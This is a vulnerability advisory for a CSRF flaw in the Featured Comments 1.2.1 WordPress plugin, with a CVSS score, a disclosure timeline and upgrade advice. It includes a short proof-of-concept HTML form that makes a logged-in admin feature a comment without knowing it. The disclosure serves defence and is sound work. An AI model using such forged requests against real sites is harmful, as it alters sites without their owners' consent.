CSRF in Featured Comments 1.2.1 allows an attacker to set and unset comment statuses

Vulnerability

Last revised: May 23, 2014

An attacker able to convince an admin to visit a link of their choosing is able to set/unset the buried/featured status of any comments.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	4.3 Medium
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	None
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

If a logged-in administrator user clicks the submit button on this form comment with ID of 9 will be featured. (In a real attack the form can be made to auto-submit using Javascript).

<form action="http://localhost/wp-admin/admin-ajax.php?action=feature_comments" method="POST">
  <input type="text" name="do" value="feature">
  <input type="text" name="comment_id" value="9">
  <input type="submit">
</form>

Advisory timeline

2014-05-22: Discovered
2014-05-23: Email address for report requested via contact form at pippinsplugins.com
2014-05-26: Author acknowledged report
2014-06-10: dxw chased to establish timeline for a fix
2014-06-10: Report accidentally posted to mailing lists – author advised.
2014-07-10: Author reports plugin fixed

Mitigation/further actions

Upgrade to version 1.2.2 or newer.

dxw advisories

Advisory: